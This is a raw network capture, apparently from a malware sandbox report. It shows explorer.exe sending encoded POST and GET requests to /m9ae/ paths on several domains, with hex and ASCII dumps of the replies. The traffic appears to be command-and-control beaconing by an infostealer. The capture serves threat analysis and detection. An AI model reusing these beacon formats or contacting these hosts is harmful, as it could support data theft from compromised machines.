                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        11192.168.2.549725216.40.34.4180C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:35:04.346040964 CET259OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.lee-perez.com
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 186
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.lee-perez.com
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.lee-perez.com/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 71 4c 6a 6a 75 73 45 30 7e 37 65 34 54 5a 32 65 58 6d 46 49 73 53 75 70 50 71 38 59 57 45 37 32 4a 64 63 6c 67 49 4d 5f 51 76 47 56 42 62 73 54 4b 43 69 4e 36 65 69 74 4c 70 7a 5f 77 49 51 4c 79 68 5a 30 51 4e 6d 32 38 64 34 59 33 75 71 6e 4a 76 76 4f 7e 45 78 31 76 77 62 38 6b 5a 49 4e 46 73 32 71 37 33 65 35 68 69 76 5f 46 72 58 64 54 30 35 76 59 51 42 2d 58 31 54 43 45 47 56 38 67 58 65 7a 41 79 47 4a 7a 37 37 67 68 36 70 53 34 66 37 4b 52 6e 45 66 43 65 55 54 39 42 37 44 77 72 5a 39 4b 65 58 55 67 65 6b 62 67 6c 78 6e 77 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=qLjjusE0~7e4TZ2eXmFIsSupPq8YWE72JdclgIM_QvGVBbsTKCiN6eitLpz_wIQLyhZ0QNm28d4Y3uqnJvvO~Ex1vwb8kZINFs2q73e5hiv_FrXdT05vYQB-X1TCEGV8gXezAyGJz77gh6pS4f7KRnEfCeUT9B7DwrZ9KeXUgekbglxnwg).
                                                                                                                        Nov 29, 2022 10:35:04.505157948 CET260INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.14.2
                                                                                                                        Date: Tue, 29 Nov 2022 09:35:04 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        X-Request-Id: 83a2ff74-2211-4d80-b80d-6219366e0ae4
                                                                                                                        X-Runtime: 0.045031
                                                                                                                        Content-Encoding: gzip
                                                                                                                        Data Raw: 31 33 34 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5c 6b 57 db 46 b7 fe 9e 5f 31 35 eb d4 26 c5 f2 85 5b 20 98 2e 6a 0c a1 25 90 82 d3 26 cd ca 72 85 35 b6 55 64 c9 91 64 2e e9 9b f7 b7 9f 67 ef 99 91 46 36 26 14 7a 3e 9c b5 12 56 13 21 cd ec fb 6d 66 f6 74 e7 bb fd d3 76 f7 fd 9b 8e 18 a5 e3 60 f7 d9 0e fd 23 02 37 1c b6 4a 32 2c d1 0b e9 7a bb cf 84 d8 19 cb d4 15 fd 91 1b 27 32 6d 95 a6 e9 a0 fa a2 24 6a fc 29 f5 d3 40 ee ee f5 53 3f 0a 45 3b 0a d3 38 0a 02 19 6f 8b ce 4d 5f 4e f8 6d df 9d 0e 47 e9 4e 4d 0d a5 49 49 7a 8b 49 78 12 e2 22 f2 6e c5 df fc 88 5f dc fe e5 30 8e a6 a1 57 ed 47 41 04 28 4b 07 7b f4 f3 52 0f 30 6f 57 57 57 cd ab b1 1b 0f fd 70 5b d4 27 37 ea d5 97 67 19 e0 15 31 59 11 51 b0 22 a6 f8 2f f5 32 3c 03 d0 59 1d b8 63 3f b8 dd 16 23 19 5c c9 d4 ef bb 2b e2 4a c6 9e 1b e2 c1 8d 7d 17 53 12 37 4c aa 89 8c fd 81 c1 c6 33 13 ff b3 dc 06 b9 8d 55 83 53 88 c0 0f 65 75 24 7d 70 ba 2d 1a 2f 66 88 99 c4 b2 88 5c 81 68 34 72 00 d7 23 3f 95 d5 64 e2 f6 01 1b e3 ab d7 b1 3b 29 70 84 97 ce 45 74 93 4b 2b 8a 3d 92 34 80 88 24 0a 7c 4f 2c 75 3a 1d 43 e9 c4 f5 3c 3f 1c e2 73 26 19 21 e6 84 25 c4 b5 ef a5 a3 6d b1 b5 3e 4b 33 69 5f c6 19 b6 4c 21 f5 03 fc 18 2c b9 c6 a0 ab f6 7a f3 a0 b9 36 47 40 dd 59 97 63 d1 a0 bf 0b fc 8c 1a 19 f0 8c 2e a7 89 a1 19 f4 a2 50 9d 86 01 20 84 a5 07 cc 28 82 6d ce d1 5c 24 ac 00 b5 b9 3e a3 2a c7 83 b1 fb 41 72 9f 98 f7 eb f4 93 c9 80 f5 50 8d 5d cf 9f 26 db 62 2d d7 a9 61 0b 84 e7 f6 29 84 e7 27 93 c0 85 e9 5d 04 51 ff d2 80 31 8a d8 9c 55 84 93 4c c7 80 94 bb 49 a6 5a 8c 14 8d 8c 01 72 26 a6 e4 22 4a d3 68 5c 30 8c 22 c5 77 11 a0 dd 26 63 df 36 59 c3 c7 1c aa 6d 11 46 a1 2c 88 7f a9 0f 17 71 e1 0d b9 e9 c0 68 c9 67 d8 1a 33 12 b5 b7 66 06 d8 a8 d7 ff 67 de 74 ee 30 1b 27 89 a6 71 5f 8a e7 f3 d6 93 4b 3e 13 d1 6c 58 30 b3 ff 36 21 67 de 89 f6 b7 e8 27 d3 6e 16 93 60 e1 9d 36 fd 3c 40 63 8a 44 5b 86 05 7f b4 ad 41 49 e4 0e 49 1a 52 1d cf 45 f8 35 04 5b 96 ff 22 97 58 84 d0 35 08 a2 eb 6d e1 4e d3 68 9e f6 3c 9e 1e 1c 14 d4 e5 f8 e1 20 ca 80 e7 62 9b f3 d6 22 35 0e 39 51 2f 9c 8e 2f 64 6c b9 ca 7c fc 2e 4a cc 04 91 bd bd 2c a4 e7 72 81 93 e4 58 33 63 8e 75 48 cd 83 dc fe fe be 61 30 95 37 69 d5 0d fc 21 12 00 0f 2c f2 46 44 ce f2 56 0d e4 80 42 b4 15 15 67 43 ef 3c 90 ed 11 09 38 0f 09 f3 7c 1e 6c d0 cf fc 4c c7 45 6a bc ca a9 b8 2b c5 1d b4 f1 a7 38 75 e4 7b 9e 0c 33 84 99 c3 ce b9 1b 0c 43 18 a9 6e bd a8 6f d5 d7 5f 8a 2f 6c db ee f6 95 9f 20 a7 20 ed 65 23 36 36 36 b2 cf 4e 1a 23 d7 54 07 b1 3b 96 50 e1 9d 63 0c df d9 47 1d 49 0d 8a 02 0c 27 91 81 ec 17 11 aa f1 18 ae dd 6d 09 d9 3d 95 bd d4 bd 08 8c 4c b2 d8 af 24 a0 03 04 78 0a dc 49 82 5c 68 9e e8 33 c3 29 c0 48 29 4d 89 d4 e8 66 26 02 36 73 ab f1 3c ef 7e 08 c8 ad 14 36 b5 cc 67 00 19 b9 2f 26 c0 4c 4f 47 1a c2 8c c3 2b ee 8a 19 4d c7 d3 07 01 f5 c3 c9 34 5d 4a a4 1b f7 0d 86 ea b5 bc b8 f4 e1 00 93 09 5e bb 21 55 0e e4 11 03 5f 06 8b 98 e5 7a 6b 91 b8 ac 4a 62 b1 b8 34 84 ed 30 1d 55 fb 23 3f f0 2a 91 e7 2d 1b b1 d9 d1 72 d0 a4 9f 05 52 27 30 8e bc 81 7b f4 c6 6e da
                                                                                                                        Data Ascii: 1345\kWF_15&[ .j%&r5Udd.gF6&z>V!mftv`#7J2,z'2m$j)@S?E;8oM_NmGNMIIzIx"n_0WGA(K{R0oWWWp['7g1YQ"/2<Yc?#\+J}S7L3USeu$}p-/f\h4r#?d;)pEtK+=4$|O,u:C<?s&!%m>K3i_L!,z6G@Yc.P (m\$>*ArP]&b-a)']Q1ULIZr&"Jh\0"w&c6YmF,qhg3fgt0'q_K>lX06!g'n`6<@cD[AIIRE5["X5mNh< b"59Q//dl|.J,rX3cuHa07i!,FDVBgC<8|lLEj+8u{3Cno_/l e#666N#T;PcGI'm=L$xI\h3)H)Mf&6s<~6g/&LOG+M4]J^!U_zkJb40U#?*-rR'0{n
                                                                                                                        Nov 29, 2022 10:35:04.505189896 CET262INData Raw: 1f c9 64 65 4e b7 3c 66 30 fd fc f9 d6 8c 99 43 63 02 db 31 79 ff 61 14 c0 6b ce 22 ef bd 0c 10 0c 0b 06 65 92 a2 aa 94 c8 30 ce 03 37 95 87 b1 bc 7d 30 85 10 dc 83 88 cc e5 6b 89 23 77 dd 87 db 96 29 59 33 5b 42 71 21 56 75 e8 52 66 33 71 d3 51
                                                                                                                        Data Ascii: deN<f0Cc1yak"e07}0k#w)Y3[Bq!VuRf3qQ`1pj$R~ORU_H^i},HSg(N #:\iAQ(dGQz,+334$E$~4"[T#/?<BWRy0$\
                                                                                                                        Nov 29, 2022 10:35:04.505208969 CET263INData Raw: 49 25 3a 9a 12 f4 9d c5 02 5b df 38 09 a0 bd 17 d5 3b c1 e3 e9 43 85 e8 f0 71 ec 56 7f 89 7f 76 6c ce 9c 00 0b e3 74 84 f7 3f fc 90 1f ef 59 ac 7f f0 3f 3a e8 d8 eb 5c 81 e8 63 8d ae 52 66 f4 e5 95 fc 04 56 e6 93 85 90 0e 0e 1c 68 c2 be 1c b8 d3
                                                                                                                        Data Ascii: I%:[8;CqVvlt?Y?:\cRfVh 3As65RG:SP-9BF$l][/N,PZ@2"u9ZK7sU@e\&?FLG+2:jd,X>%F
                                                                                                                        Nov 29, 2022 10:35:04.505228043 CET264INData Raw: ea 82 d5 fa e5 86 64 82 8a df ad 52 b6 00 13 00 95 d7 db 33 39 cf 9d 2b 1f bc 6f 66 31 1f 5a a8 39 d5 3d 00 40 31 25 9a 82 1d 4a 38 53 4a 30 4d 83 d7 23 74 dc 87 11 94 c9 71 f0 ca 0d a6 52 f8 88 5a b0 55 68 86 59 56 df 88 5d d8 d1 45 30 25 f7 ca
                                                                                                                        Data Ascii: dR39+of1Z9=@1%J8SJ0M#tqRZUhYV]E0%cF4{`c-lXff`l`9)19*3MQetVEdZa-uZvHq1HhJU%F$Vh~(/osQaF`advHE>
                                                                                                                        Nov 29, 2022 10:35:04.505243063 CET264INData Raw: a7 b1 b6 ea ac 6d e9 09 8a 80 bd e3 de 79 fb ec e8 4d b7 77 b2 f7 3a 63 4b 0f 39 eb bc 3e ed 76 7a 7b fb fb 39 a8 e6 a6 53 c7 4f 43 0f 39 ef 9c 81 ae c2 e4 45 4c e8 a1 6f ce 4e bb a7 ed 5c 38 9a 0f 0d f0 6e c3 bc 3f 0a a9 9d 0a 3b 0c bd e2 3b 69
                                                                                                                        Data Ascii: myMw:cK9>vz{9SOC9ELoN\8n?;;i1r8nMb:oVwwE0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        12192.168.2.549726216.40.34.4180C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:35:06.492492914 CET265OUTGET /m9ae/?F6z4=nJLDtYwD0af/ePmsJ0ZKjiSVJI8rGVPKc+UQspc6K5yuMKQDKTWfrb6tVbro5/Rq1DJ6W8y/y+8M88qCUODrzxtLw2C30JMyEA==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1
                                                                                                                        Host: www.lee-perez.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 29, 2022 10:35:06.675761938 CET266INHTTP/1.1 200 OK
                                                                                                                        Server: nginx/1.14.2
                                                                                                                        Date: Tue, 29 Nov 2022 09:35:06 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-Download-Options: noopen
                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                        ETag: W/"978683294b3d58bdce845e50000e2a5d"
                                                                                                                        Cache-Control: max-age=0, private, must-revalidate
                                                                                                                        X-Request-Id: 5b6e2b6c-980d-4d16-8d65-f49b314880d8
                                                                                                                        X-Runtime: 0.041402
                                                                                                                        Data Raw: 65 34 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 3a 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 3d 27 20 72 65 6c 3d 27 69 63 6f 6e 27 3e 0a 3c 74 69 74 6c 65 3e 6c 65 65 2d 70 65 72 65 7a 2e 63 6f 6d 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 34 30 30 2c 36 30 30 2c 37 30 30 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 61 70 70 6c 69 63 61 74 69 6f 6e 2d 32 66 37 65 37 66 33 30 64 38 31 32 64 30 66 33 39 35 30 39 31 38 63 37 35 36 32 64 66 37 65 36 38 65 65 65 65 62 64 38 36 34 39 62 64 65 61 32 62 63 33 38 34 34 65 62 30 37 66 63 38 32 36 39 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f
                                                                                                                        Data Ascii: e46<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>lee-perez.com is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.ho
                                                                                                                        Nov 29, 2022 10:35:06.675852060 CET268INData Raw: 76 65 72 2e 63 6f 6d 2f 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36
                                                                                                                        Data Ascii: ver.com/?source=parked"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>lee-perez.com</h1><h2>is a totally awesome idea still being wor
                                                                                                                        Nov 29, 2022 10:35:06.675920963 CET269INData Raw: 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 61 62 6f 75 74 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 41 62 6f 75 74 20 55 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 68
                                                                                                                        Data Ascii: tps://www.hover.com/about?source=parked">About Us</a></li><li><a rel="nofollow" href="https://help.hover.com/home?source=parked">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=parked">Your Account</a></li></ul>
                                                                                                                        Nov 29, 2022 10:35:06.675976038 CET269INData Raw: 20 30 2e 39 31 31 35 35 2c 38 2e 30 31 38 37 35 20 2d 32 39 2e 32 34 33 34 34 2c 2d 31 2e 34 36 37 32 33 20 2d 35 35 2e 31 36 39 39 35 2c 2d 31 35 2e 34 37 35 38 32 20 2d 37 32 2e 35 32 34 36 31 2c 2d 33 36 2e 37 36 33 39 36 20 2d 33 2e 30 32 38
                                                                                                                        Data Ascii: 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.1466
                                                                                                                        Nov 29, 2022 10:35:06.676039934 CET271INData Raw: 39 30 64 0d 0a 2e 34 37 31 31 34 2c 2d 30 2e 32 32 31 32 34 20 2d 36 2e 36 32 30 31 31 2c 2d 30 2e 36 33 31 31 34 20 34 2e 34 37 38 30 31 2c 31 33 2e 39 37 38 35 37 20 31 37 2e 34 37 32 31 34 2c 32 34 2e 31 35 31 34 33 20 33 32 2e 38 36 39 39 32
                                                                                                                        Data Ascii: 90d.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.80
                                                                                                                        Nov 29, 2022 10:35:06.676086903 CET272INData Raw: 30 20 31 30 35 2e 35 74 2d 33 20 39 36 2e 35 74 2d 31 30 20 31 30 33 74 2d 31 38 2e 35 20 37 31 2e 35 71 2d 32 30 20 35 30 20 2d 35 38 20 38 38 74 2d 38 38 20 35 38 71 2d 32 39 20 31 31 20 2d 37 31 2e 35 20 31 38 2e 35 74 2d 31 30 33 20 31 30 74
                                                                                                                        Data Ascii: 0 105.5t-3 96.5t-10 103t-18.5 71.5q-20 50 -58 88t-88 58q-29 11 -71.5 18.5t-103 10t-96.5 3t-105.5 0t-76.5 -0.5zM1536 640q0 -229 -5 -317 q-10 -208 -124 -322t-322 -124q-88 -5 -317 -5t-317 5q-208 10 -322 124t-124 322q-5 88 -5 317t5 317q10 208 124


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        13192.168.2.54972738.40.166.19580C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:35:12.158039093 CET273OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.frwqc.com
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 410
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.frwqc.com
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.frwqc.com/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 6b 77 50 68 58 4b 77 59 66 55 41 39 6a 57 4e 32 36 34 58 4d 59 77 62 4c 75 48 6d 6d 31 79 6f 57 7e 67 4f 5f 6e 33 6f 71 4c 5a 56 4a 7e 73 63 34 32 36 7e 69 4f 42 49 61 69 4e 74 72 6c 79 57 62 33 6f 65 62 52 6d 4e 73 58 43 78 67 71 52 51 4b 35 37 68 47 4d 56 6e 47 77 73 47 57 64 45 6f 6c 34 43 36 5f 57 34 67 37 47 74 63 37 34 78 48 38 54 61 79 37 59 37 53 4c 47 30 43 32 65 4b 63 58 6c 66 6e 35 64 71 66 47 43 41 71 5f 48 63 4b 68 39 6b 37 6a 62 4b 30 2d 4a 6d 79 55 74 30 69 63 48 48 68 64 30 78 36 71 4a 64 65 63 71 56 68 36 34 42 4e 39 38 64 63 37 50 51 6c 45 63 39 49 78 47 71 41 55 73 51 67 69 55 5a 42 6c 37 38 68 59 64 43 76 6b 66 75 33 41 4f 30 71 6b 30 50 74 4b 35 65 57 62 75 4f 69 5f 4d 56 58 33 37 58 6a 6c 44 58 34 56 33 34 59 76 54 57 6e 36 44 66 42 47 5a 4b 5a 4a 66 78 69 31 56 79 73 68 71 4b 42 68 4f 77 53 69 38 53 28 47 34 62 65 36 71 53 79 56 73 73 56 65 47 52 5a 5f 78 64 6e 4f 76 4f 78 6a 6e 4a 34 43 6d 59 6b 6e 75 46 49 54 63 31 6a 51 7e 53 6b 57 43 56 59 54 51 66 7e 75 64 64 50 67 31 76 6e 78 61 6d 52 55 49 4f 41 31 44 41 61 2d 6e 58 6a 74 73 39 52 55 6e 41 45 6e 6c 57 38 41 75 4f 35 76 6a 78 49 5f 4c 79 5a 33 47 65 7a 43 6d 66 4a 45 70 47 50 48 55 73 32 59 5a 31 35 36 56 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=kwPhXKwYfUA9jWN264XMYwbLuHmm1yoW~gO_n3oqLZVJ~sc426~iOBIaiNtrlyWb3oebRmNsXCxgqRQK57hGMVnGwsGWdEol4C6_W4g7Gtc74xH8Tay7Y7SLG0C2eKcXlfn5dqfGCAq_HcKh9k7jbK0-JmyUt0icHHhd0x6qJdecqVh64BN98dc7PQlEc9IxGqAUsQgiUZBl78hYdCvkfu3AO0qk0PtK5eWbuOi_MVX37XjlDX4V34YvTWn6DfBGZKZJfxi1VyshqKBhOwSi8S(G4be6qSyVssVeGRZ_xdnOvOxjnJ4CmYknuFITc1jQ~SkWCVYTQf~uddPg1vnxamRUIOA1DAa-nXjts9RUnAEnlW8AuO5vjxI_LyZ3GezCmfJEpGPHUs2YZ156Vg).
                                                                                                                        Nov 29, 2022 10:35:12.320441008 CET275INHTTP/1.1 404 Not Found
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        Date: Tue, 29 Nov 2022 09:35:08 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 1163
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be b3 fd a3 ac d2 d1 b8 fc b8 c4 c3 fb b3 c6 bb f2 d5 df d4 dd ca b1 b2 bb bf c9 d3
